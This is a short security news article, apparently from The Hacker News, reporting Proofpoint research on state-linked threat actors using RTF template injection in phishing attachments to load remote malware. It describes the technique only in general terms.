Threat actors from three countries—China, Russia, India—are using a new method, RTF (Rich Text Format) template injection, to plant malware in targeted systems.
“RTF template injection is a novel technique that is ideal for malicious phishing attachments because it is simple and allows threat actors to retrieve malicious content from a remote URL using an RTF file,” Proofpoint researchers said in a new report shared with The Hacker News.
An RTF file containing decoy content is at the cornerstone of the attack. The content can be manipulated for retrieving content, content like malicious payloads that are hosted at an external URL. It uses an RTF template to change the document’s formatting features with the help of a hex editor by stating a URL resource rather than an accessible file resource destination from which a remote payload may be obtained.
In other words, the attackers can send infected Microsoft Word documents to their targets and these documents appear normal but once downloaded wreak havoc on the target’s systems. It can load malicious code through the template feature remotely. This evasive method makes it fairly successful when seen as a whole with phishing attacks as an upfront delivery vector.
“The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide,” the researchers said. “While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”